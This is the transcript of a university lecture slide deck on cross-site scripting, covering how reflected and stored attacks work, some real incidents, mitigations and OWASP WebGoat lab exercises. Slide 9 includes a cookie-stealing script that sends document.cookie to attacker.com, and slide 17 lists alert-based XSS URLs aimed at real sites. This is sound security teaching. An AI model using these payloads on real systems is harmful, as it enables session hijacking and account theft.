Cross Site Scripting XSS - PowerPoint PPT Presentation

1 / 39
About This Presentation
Title:

Cross Site Scripting XSS

Description:

Legitimate site returns injected code in web page. ... MySpace worm (October 2005) When someone viewed Samy's ... First Login as Tom with tom as password. ... – PowerPoint PPT presentation

Number of Views:2698
Avg rating:3.0/5.0
Slides: 40
Provided by: NKU
Category:
Tags: xss | cross | scripting | site

less

Transcript and Presenter's Notes

Title: Cross Site Scripting XSS


1
Cross Site Scripting (XSS)
  • Charles Frank
  • Northern Kentucky University

2
Cross-Site Scripting (XSS)
  • Attacker causes a legitimate web server to send
    user executable content (Javascript, Flash
    ActiveScript) of attackers choosing.
  • XSS used to obtain session ID for
  • Bank site (transfer money to attacker)
  • Shopping site (buy goods for attacker)
  • E-mail
  • Key ideas
  • Attacker sends malicious code to server.
  • Victims browser loads code from server and runs
    it.

3
Vulnerability Trends for 2006
4
Anatomy of an XSS Attack
  • User logs into legitimate site.
  • Site sends user authentication cookie.
  • Attacker sends user XSS attack containing
    injected code.
  • User clicks on XSS link in email, web, IM.
  • Browser contacts vulnerable URL at legitimate
    site with cookie in URL.
  • Legitimate site returns injected code in web
    page.
  • Browser runs injected code, which accesses evil
    site with cookie in URL.
  • Evil site records user cookie.
  • Attacker uses cookie to authenticate to
    legitimate site as user.

5
XSS Example
  • Client browser sends an error message to the web
    server.
  • https//example.com/error.php?messageSorry2Can
    erroroccurred

6
XSS Example
  • The error message is Reflected back from the
    Web server to the client in a web page.
  • ltpgtSorry, an error occurred.lt/pgt

7
XSS Example
  • We can replace the error with JavaScript
  • https//example.com/error.php?messageltscriptgtaler
    t(xss)lt/scriptgt

8
Proof of Concept
9
Exploiting the Vulnerability
  • User logins in and is issued a cookie
  • Attacker feed the URL to user
  • https//example.com/error.php?messageltscriptgtvar
    inewImagei.srchttp//attacker.com/2bdocume
    nt.cookielt/scriptgt

10
Exploiting the Vulnerability
  • The server responds by sending the user a web
    page that runs the Java script.
  • The code makes a request to attacker.com
    containing the session token.

11
Exploiting the Vulnerability
  • The attacker monitors requests to attacker.com.
  • He uses the captured session token to gain access
    to the users personal information and perform
    actions as the user.

12
Email Snare
  • From Example Customer Services
  • To J Q Customer
  • Dear Valued Customer,
  • You have been selected to participate in our
    customer survey. Please complete our easy 5
    question survey, and return we will credit 5 to
    your account.

13
Email Snare
  • To access the survey, please log in to your
    account using your usual bookmark, and then click
    on the following link
  • https//example.com/657272...?message3d...att
    61636b.com...docum65..63ookie...

14
Reassuring Email
  • The link contains the correct domain name (unlike
    phishing).
  • The URL has been obfuscated
  • It uses https

15
Reflected XSS
  • Reflected XSS
  • Injected script returned by one-time message.
  • Requires tricking user to click on link.
  • Non-persistent. Only works when user clicks.

16
Anatomy of an XSS Attack
Web Server
8. Attacker hijacks user session.
1. Login
Attacker
User
2. Cookie
5. XSS URL
3. XSS Attack
6. Page with injected code.
7. Browser runs injected code.
4. User clicks on XSS link.
Evil site saves ID.
17
XSS URL Examples
  • http//www.microsoft.com/education/?IDMCTNtarget
    http//www.microsoft.com/education/?IDMCTNtarge
    t"gtltscriptgtalert(document.cookie)lt/scriptgt
  • http//hotwired.lycos.com/webmonkey/00/18/index3a_
    page2.html?twltscriptgtalert(Test)lt/scriptgt
  • http//www.shopnbc.com/listing.asp?qultscriptgtaler
    t(document.cookie)lt/scriptgtfrompage4page1ctV
    VTVmh0sh0RN1
  • http//www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_sea
    rch_exe?search_text_223E3Cscript3Ealert28doc
    ument.cookie293C2Fscript3E

18
Stored XSS
  • Stored XSS
  • Injected script stored in comment, message, etc.
  • Requires ability to insert malicious code into
    web documents (comments, reviews, etc.)
  • Persistent until message deleted.

19
Stored XSS
  • Auction site that allows buyers to post questions
    and sellers to post responses.
  • If an attacker can post a question containing a
    script, the attacker could get a user to bid
    without intending to or get the seller to close
    the auction and accept the attackers low bid.

20
Why does XSS Work?
  • Same-Origin Policy
  • Browser only allows Javascript from site X to
    access cookies and other data from site X.
  • Attacker needs to make attack come from site X.
  • Vulnerable Server Program
  • Any program that returns user input without
    filtering out dangerous code.

21
XSS Attacks
  • MySpace worm (October 2005)
  • When someone viewed Samys profile
  • Set him as friend of viewer.
  • Incorporated code in viewers profile.
  • Paypal (2006)
  • XSS redirect used to steal money from Paypal
    users in a phishing scam.
  • BBC, CBS (2006)
  • By following XSS link from securitylab.ru, you
    could read an apparently valid story on the BBC
    or CBS site claiming that Bush appointed a 9-year
    old as head of the Information Security
    department.

22
Impact of XSS
  • Attackers can hijack user accounts.
  • Attackers can hijack admin accounts too.
  • Attacker can do anything a user can do.
  • Difficult to track down source of attack.

23
Mitigating XSS
  • Disallow HTML input
  • Allow only safe HTML tags
  • Filter output
  • Replace HTML special characters in output
  • ex replace lt with lt and gt with gt
  • also replace (, ), ,
  • Tagged cookies
  • Include IP address in cookie and only allow
    access to original IP address that cookie was
    created for.

24
XSS Problem
  • XSS is a complex problem that is not going away
    anytime soon.
  • The browser is insecure by design.
  • It understand JavaScript.
  • It isnt the browsers job to determine what code
    is good or bad.
  • Disabling scripting seriously dampens the users
    browsing experience.

25
Cross-Site Scripting Demo
26
OWASP WebGoat
  • http//www.owasp.org/index.php/CategoryOWASP_WebG
    oat_Project
  • WebGoat 5.2 Standard
  • WebGoat 5.2 Developer
  • Run webgoat.bat to start Tomcat
  • Enter http//localhost/WebGoat/attack in your
    browser

27
OWASP WebGoat
  • Username guest
  • Password guest
  • Start WebGoat

28
Reflected XSS Attacks
  • Solution
  • Enter ltscriptgtalert('Bang!')lt/scriptgt for the PIN
    value
  • View Page Source
  • Edit Find Bang

29
Stage 6 Blocked Reflected XSS
  • You have to edit org.owasp.webgoat.lessons.CrossSi
    teScripting.FindProfile.java. Alter the method
    getRequestParameter. The body of the mehtod
    should look something like this

30
Stage 6 Blocked Reflected XSS
  • String regex "\\s\\w-,"
  • String parameter s.getParser().getRawParameter(n
    ame)
  • Pattern pattern Pattern.compile(regex)
  • validate(parameter, pattern)
  • return parameter

31
Stage 1 Stored XSS
  • First Login as Tom with tom as password.
  • Select Tom from the list and click on the View
    Profile Button. Now should appear Tom's Profile.

32
Stage 1 Stored XSS
  • Click on the 'Edit Profile' Button and try an XSS
    attack on the street field.For example
    ltscriptgtalert("Got Ya")lt/scriptgt
  • Click on the UpdateProfile Button and Log out.

33
Stage 1 Stored XSS
  • Now log in as Jerry with jerry as password.
    Select from the the list the profile of tom and
    hit the ViewProfile Button.

34
Stage 2 Blocked Stored XSS using Input Validation
  • SolutionYou have to alter the method
    parseEmployeeProfile in the class
    UpdateProfile.java which is placed in the package
    org.owasp.webgoat.lessons.CrossSiteScriptingThe
    place to code is marked!

35
Stage 2 Blocked Stored XSS using Input Validation
  • String regex "\\s\\w-,"String
    stringToValidate firstNamelastNamessntitleph
    oneaddress1address2startDateccndisciplinaryA
    ctionDatedisciplinaryActionNotespersonalDescrip
    tionPattern pattern Pattern.compile(regex)va
    lidate(stringToValidate, pattern)

36
Stage 2 Blocked Stored XSS using Input Validation
  • This validation allows following\s
    whitespace \t\n\x0B\f\r\w word
    a-zA-Z_0-9and the characters - and ,
  • Use of any other character will throw a
    Validation Exception.

37
Stage 3 Stored XSS Revisted
  • Log in as David with david as password. Choose
    Bruce from the List and click on the
    'ViewProfile' Button.

38
Stage 4 Blocked XSS using Output Encoding
  • You have to use a static method called
    encode(String s) which is part of the class
    org.owasp.webgoat.util.HtmlEncoder.
  • This method changes all special characters in the
    string.
  • Now you have to use this method in the
    getEmployeeProfile method in the
    org.owasp.webgoat.lessons.CrossSiteScripting
    class. Replace all answer_results.getString(someSt
    ring) with HtmlEncoder.encode(answer_results.getSt
    ring(someString)) and you are done.

39
XSS References
Write a Comment
User Comments (0)
About PowerShow.com